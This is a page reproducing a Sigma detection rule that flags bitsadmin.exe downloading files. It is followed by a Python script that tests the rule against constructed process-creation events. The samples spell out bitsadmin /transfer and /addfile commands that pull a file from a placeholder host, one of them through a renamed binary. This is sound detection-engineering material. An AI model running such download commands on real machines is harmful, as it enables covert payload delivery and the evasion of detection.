File Download Via Bitsadmin
Detects usage of bitsadmin downloading a file
Sigma rule
title: File Download Via Bitsadmin
id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede
status: test
description: Detects usage of bitsadmin downloading a file
references:
    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
    - https://isc.sans.edu/diary/22264
    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
author: Michael Haag, FPT.EagleEye
date: 2017-03-09
modified: 2023-02-15
tags:
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1197
    - attack.s0190
    - attack.t1036.003
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\bitsadmin.exe'
        - OriginalFileName: 'bitsadmin.exe'
    selection_cmd:
        CommandLine|contains: ' /transfer '
    selection_cli_1:
        CommandLine|contains:
            - ' /create '
            - ' /addfile '
    selection_cli_2:
        CommandLine|contains: 'http'
    condition: selection_img and (selection_cmd or all of selection_cli_*)
falsepositives:
    - Some legitimate apps use this, but limited.
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/info.yml
simulation:
    - type: atomic-red-team
      name: Windows - BITSAdmin BITS Download
      technique: T1105
      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
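To make the condition concrete, here is an added Python example (not part of the SigmaHQ rule or of this page) that applies the rule's selections to a handful of constructed Windows process-creation events. It follows Sigma's default matching semantics for the modifiers the rule uses: string comparisons are case-insensitive, a list under one field is an OR, and `all of selection_cli_*` requires both `selection_cli_1` and `selection_cli_2`. The event dictionaries, their `id` labels, the paths and the `files.example.invalid` hostname are all made up for illustration.

```python
"""Evaluate the 'File Download Via Bitsadmin' condition against sample events.

Added example, not SigmaHQ code. Field names (Image, OriginalFileName,
CommandLine) are the Sigma process_creation field names used by the rule;
the 'id' key is our own label for each constructed sample.
"""


def _ci(value):
    """Sigma string matching is case-insensitive by default."""
    return (value or "").lower()


def selection_img(event):
    """Image|endswith '\\bitsadmin.exe'  OR  OriginalFileName == 'bitsadmin.exe'.

    The OriginalFileName branch is what still catches a renamed binary.
    """
    return (_ci(event.get("Image")).endswith("\\bitsadmin.exe")
            or _ci(event.get("OriginalFileName")) == "bitsadmin.exe")


def selection_cmd(event):
    """CommandLine|contains ' /transfer '."""
    return " /transfer " in _ci(event.get("CommandLine"))


def selection_cli_1(event):
    """CommandLine|contains ' /create ' OR ' /addfile ' (list == OR)."""
    cmd = _ci(event.get("CommandLine"))
    return " /create " in cmd or " /addfile " in cmd


def selection_cli_2(event):
    """CommandLine|contains 'http'."""
    return "http" in _ci(event.get("CommandLine"))


def matches(event):
    """condition: selection_img and (selection_cmd or all of selection_cli_*)."""
    return selection_img(event) and (
        selection_cmd(event)
        or (selection_cli_1(event) and selection_cli_2(event))
    )


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # one-shot /transfer with a URL: the classic case
        "id": "transfer",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /transfer upd /download /priority high "
                       r"http://files.example.invalid/a.dat C:\Users\Public\a.dat",
    },
    {   # renamed copy: Image no longer ends in bitsadmin.exe, OriginalFileName does
        "id": "renamed_addfile",
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"svc.exe /addfile job1 "
                       r"http://files.example.invalid/a.dat C:\Users\Public\a.dat",
    },
    {   # /create on its own carries no URL, so all of selection_cli_* fails
        "id": "create_only",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": "bitsadmin.exe /create job1",
    },
    {   # benign enumeration of existing jobs
        "id": "list",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": "bitsadmin.exe /list /allusers",
    },
    {   # same tokens on the command line of a different binary: selection_img gates it out
        "id": "other_binary",
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd.exe /c echo /transfer http",
    },
]


def run_samples(events=SAMPLE_EVENTS):
    """Return [(id, matched)] for each event."""
    return [(e["id"], matches(e)) for e in events]


if __name__ == "__main__":
    for event_id, hit in run_samples():
        print(f"{event_id:16s} -> {'ALERT' if hit else 'no match'}")
```

Two of the samples are worth a second look. `renamed_addfile` shows why the rule checks `OriginalFileName` alongside `Image`: the PE version resource survives a rename, so the second branch of `selection_img` still fires. `create_only` shows the rule's scope: a bare `/create` is not flagged on its own; the alert comes from whichever later process creation carries the URL (`/addfile` or `/transfer`), so on a multi-step job you should expect the hit on that event rather than on the first one.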
Related rules
- File Download Via Bitsadmin To A Suspicious Target Folder
- File With Suspicious Extension Downloaded Via Bitsadmin
- Suspicious Download From File-Sharing Website Via Bitsadmin
- Bitsadmin to Uncommon IP Server Address
- Bitsadmin to Uncommon TLD